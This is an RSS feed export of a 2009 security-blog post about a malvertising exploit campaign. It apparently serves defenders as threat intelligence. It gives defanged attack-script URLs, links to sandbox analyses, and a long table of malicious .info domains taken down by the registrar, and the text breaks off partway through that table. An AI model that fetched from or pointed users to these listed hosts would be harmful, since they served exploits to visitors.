<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andrew Martin &#187; Malware Binaries (exe/dll)</title>
	<atom:link href="http://www.martinsecurity.net/category/malware-binaries-exedll/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.martinsecurity.net</link>
	<description>Viewing InfoSec from the trenches (formerly Real Security)</description>
	<lastBuildDate>Fri, 18 Dec 2009 19:29:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Major Stealthy Malware Campaign &#8211; 711 Domains Taken Down</title>
		<link>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/</link>
		<comments>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 21:52:18 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=427</guid>
		<description><![CDATA[Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which [...]]]></description>
			<content:encoded><![CDATA[<p>Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.</p>
<p>To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!</p>
<p>Attack scripts:</p>
<p>hxxp://us.hn0.info/f/1/ie.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372" href="http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372">http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372</a></p>
<p>hxxp://us.hn0.info/f/1/ff.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360" href="http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360">http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360</a></p>
<p>hxxp://us.hn0.info/f/1/cosplay.swf<br />
<a title="blocked::http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf" href="http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf">http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf</a></p>
<p>Shellcode:<br />
<a title="blocked::http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262" href="http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262">http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262</a></p>
<p>The domains:</p>
<table style="border-collapse: collapse; width: 271pt;" border="0" cellspacing="0" cellpadding="0" width="361">
<col style="width: 55pt;" width="73"></col>
<col style="width: 108pt;" width="144"></col>
<col style="width: 60pt;" width="80"></col>
<col style="width: 48pt;" width="64"></col>
<tbody>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt; width: 55pt;" width="73" height="20">FK0.INFO<span> </span></td>
<td style="width: 108pt;" width="144">AC0.INFO<span> </span></td>
<td style="width: 60pt;" width="80">KD8.INFO<span> </span></td>
<td style="width: 48pt;" width="64">JZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK6.INFO<span> </span></td>
<td>AE0.INFO<span> </span></td>
<td>KD9.INFO<span> </span></td>
<td>JZ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK7.INFO<span> </span></td>
<td>AE6.INFO<span> </span></td>
<td>CUUB.INFO<span> </span></td>
<td>JZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK8.INFO<span> </span></td>
<td>AE9.INFO<span> </span></td>
<td>CXXB.INFO<span> </span></td>
<td>JZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK9.INFO<span> </span></td>
<td>AF0.INFO<span> </span></td>
<td>DRRB.INFO<span> </span></td>
<td>KA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL0.INFO<span> </span></td>
<td>AF5.INFO<span> </span></td>
<td>DTTB.INFO<span> </span></td>
<td>KB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL7.INFO<span> </span></td>
<td>AF8.INFO<span> </span></td>
<td>DYYB.INFO<span> </span></td>
<td>KB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL8.INFO<span> </span></td>
<td>AF9.INFO<span> </span></td>
<td>GJGJ.INFO<span> </span></td>
<td>KC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM0.INFO<span> </span></td>
<td>AG0.INFO<span> </span></td>
<td>RFVT.INFO<span> </span></td>
<td>KC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM9.INFO<span> </span></td>
<td>AG7.INFO<span> </span></td>
<td>TGBY.INFO<span> </span></td>
<td>KC8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN3.INFO<span> </span></td>
<td>AG8.INFO<span> </span></td>
<td>UJMI.INFO<span> </span></td>
<td>KD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN4.INFO<span> </span></td>
<td>AG9.INFO<span> </span></td>
<td>YHNU.INFO<span> </span></td>
<td>KD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN5.INFO<span> </span></td>
<td>AH0.INFO<span> </span></td>
<td>DT0.INFO<span> </span></td>
<td>KD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN6.INFO<span> </span></td>
<td>AH5.INFO<span> </span></td>
<td>DV0.INFO<span> </span></td>
<td>HX0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN7.INFO<span> </span></td>
<td>AH7.INFO<span> </span></td>
<td>DV6.INFO<span> </span></td>
<td>HY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN8.INFO<span> </span></td>
<td>AI0.INFO<span> </span></td>
<td>DV7.INFO<span> </span></td>
<td>HY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO0.INFO<span> </span></td>
<td>AJ3.INFO<span> </span></td>
<td>DW0.INFO<span> </span></td>
<td>HY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO5.INFO<span> </span></td>
<td>AJ4.INFO<span> </span></td>
<td>DW9.INFO<span> </span></td>
<td>HY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO6.INFO<span> </span></td>
<td>AJ5.INFO<span> </span></td>
<td>DX6.INFO<span> </span></td>
<td>HZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO7.INFO<span> </span></td>
<td>AJ7.INFO<span> </span></td>
<td>DX7.INFO<span> </span></td>
<td>HZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP4.INFO<span> </span></td>
<td>AJ9.INFO<span> </span></td>
<td>DX8.INFO<span> </span></td>
<td>HZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP5.INFO<span> </span></td>
<td>AK0.INFO<span> </span></td>
<td>DY2.INFO<span> </span></td>
<td>HZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP9.INFO<span> </span></td>
<td>AN0.INFO<span> </span></td>
<td>DY5.INFO<span> </span></td>
<td>HZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ0.INFO<span> </span></td>
<td>AO0.INFO<span> </span></td>
<td>DZ4.INFO<span> </span></td>
<td>HZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ3.INFO<span> </span></td>
<td>AO3.INFO<span> </span></td>
<td>DZ5.INFO<span> </span></td>
<td>IA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ4.INFO<span> </span></td>
<td>AO8.INFO<span> </span></td>
<td>EA0.INFO<span> </span></td>
<td>IB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ6.INFO<span> </span></td>
<td>AP3.INFO<span> </span></td>
<td>EA2.INFO<span> </span></td>
<td>IB4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ7.INFO<span> </span></td>
<td>AP9.INFO<span> </span></td>
<td>EA4.INFO<span> </span></td>
<td>IB5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FR0.INFO<span> </span></td>
<td>AQ0.INFO<span> </span></td>
<td>EA5.INFO<span> </span></td>
<td>IB6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS0.INFO<span> </span></td>
<td>AQ3.INFO<span> </span></td>
<td>EA6.INFO<span> </span></td>
<td>IB7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS4.INFO<span> </span></td>
<td>AQ9.INFO<span> </span></td>
<td>EA7.INFO<span> </span></td>
<td>IB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS6.INFO<span> </span></td>
<td>AR0.INFO<span> </span></td>
<td>EA8.INFO<span> </span></td>
<td>IB9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS7.INFO<span> </span></td>
<td>AT4.INFO<span> </span></td>
<td>EB0.INFO<span> </span></td>
<td>IC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT0.INFO<span> </span></td>
<td>AU0.INFO<span> </span></td>
<td>EB4.INFO<span> </span></td>
<td>IF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT5.INFO<span> </span></td>
<td>AW0.INFO<span> </span></td>
<td>ED0.INFO<span> </span></td>
<td>IF5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT9.INFO<span> </span></td>
<td>AX0.INFO<span> </span></td>
<td>ED3.INFO<span> </span></td>
<td>IF6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU0.INFO<span> </span></td>
<td>AX3.INFO<span> </span></td>
<td>EF2.INFO<span> </span></td>
<td>IF7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU4.INFO<span> </span></td>
<td>AY0.INFO<span> </span></td>
<td>EH4.INFO<span> </span></td>
<td>IF8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU8.INFO<span> </span></td>
<td>AZ5.INFO<span> </span></td>
<td>EH7.INFO<span> </span></td>
<td>IF9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV4.INFO<span> </span></td>
<td>AZ6.INFO<span> </span></td>
<td>EI4.INFO<span> </span></td>
<td>IG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV6.INFO<span> </span></td>
<td>AZ7.INFO<span> </span></td>
<td>EI5.INFO<span> </span></td>
<td>IG6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV7.INFO<span> </span></td>
<td>AZ8.INFO<span> </span></td>
<td>EI6.INFO<span> </span></td>
<td>IG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV8.INFO<span> </span></td>
<td>AZ9.INFO<span> </span></td>
<td>EI8.INFO<span> </span></td>
<td>IH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV9.INFO<span> </span></td>
<td>BC0.INFO<span> </span></td>
<td>EI9.INFO<span> </span></td>
<td>IH2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW0.INFO<span> </span></td>
<td>BC6.INFO<span> </span></td>
<td>EK0.INFO<span> </span></td>
<td>IH3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW5.INFO<span> </span></td>
<td>BC8.INFO<span> </span></td>
<td>EK2.INFO<span> </span></td>
<td>IH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW6.INFO<span> </span></td>
<td>BC9.INFO<span> </span></td>
<td>EK4.INFO<span> </span></td>
<td>IH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW8.INFO<span> </span></td>
<td>BD3.INFO<span> </span></td>
<td>EK5.INFO<span> </span></td>
<td>IH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW9.INFO<span> </span></td>
<td>BF0.INFO<span> </span></td>
<td>EK7.INFO<span> </span></td>
<td>IJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY0.INFO<span> </span></td>
<td>BF4.INFO<span> </span></td>
<td>EL0.INFO<span> </span></td>
<td>IJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY2.INFO<span> </span></td>
<td>BF6.INFO<span> </span></td>
<td>EL6.INFO<span> </span></td>
<td>IJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY5.INFO<span> </span></td>
<td>BF8.INFO<span> </span></td>
<td>EM5.INFO<span> </span></td>
<td>IJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY6.INFO<span> </span></td>
<td>BF9.INFO<span> </span></td>
<td>EM8.INFO<span> </span></td>
<td>IJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ0.INFO<span> </span></td>
<td>BG0.INFO<span> </span></td>
<td>EM9.INFO<span> </span></td>
<td>IK3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ3.INFO<span> </span></td>
<td>BH0.INFO<span> </span></td>
<td>EN8.INFO<span> </span></td>
<td>IK4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ4.INFO<span> </span></td>
<td>BH2.INFO<span> </span></td>
<td>EO0.INFO<span> </span></td>
<td>IK5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ5.INFO<span> </span></td>
<td>BI6.INFO<span> </span></td>
<td>EO3.INFO<span> </span></td>
<td>IK6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ7.INFO<span> </span></td>
<td>BI7.INFO<span> </span></td>
<td>EO5.INFO<span> </span></td>
<td>IK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ8.INFO<span> </span></td>
<td>BJ4.INFO<span> </span></td>
<td>EO6.INFO<span> </span></td>
<td>IK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GB0.INFO<span> </span></td>
<td>BK2.INFO<span> </span></td>
<td>EO7.INFO<span> </span></td>
<td>IK9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC0.INFO<span> </span></td>
<td>BL0.INFO<span> </span></td>
<td>EO8.INFO<span> </span></td>
<td>IL0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC6.INFO<span> </span></td>
<td>BL8.INFO<span> </span></td>
<td>EO9.INFO<span> </span></td>
<td>IL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC7.INFO<span> </span></td>
<td>BL9.INFO<span> </span></td>
<td>EP6.INFO<span> </span></td>
<td>IL8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC8.INFO<span> </span></td>
<td>BM3.INFO<span> </span></td>
<td>EP7.INFO<span> </span></td>
<td>IO2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
<td>IO3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
<td>IO5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
<td>IO6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
<td>IQ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
<td>IR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
<td>IR6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
<td>IR7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
<td>IR9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
<td>IU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
<td>IU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
<td>IV2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
<td>IV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
<td>IV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
<td>IV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
<td>IW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
<td>IW2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
<td>IW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
<td>IW5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
<td>IW6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
<td>IX4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
<td>IX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
<td>IX6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
<td>IX7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
<td>IY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
<td>IY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
<td>IY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
<td>IY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
<td>IY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
<td>IY8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
<td>IY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
<td>IZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
<td>IZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
<td>IZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
<td>IZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
<td>IZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
<td>IZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
<td>JA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
<td>JB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
<td>JC2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
<td>JC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
<td>JC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
<td>JD2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
<td>JD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
<td>JD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
<td>KE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
<td>KF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
<td>KF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
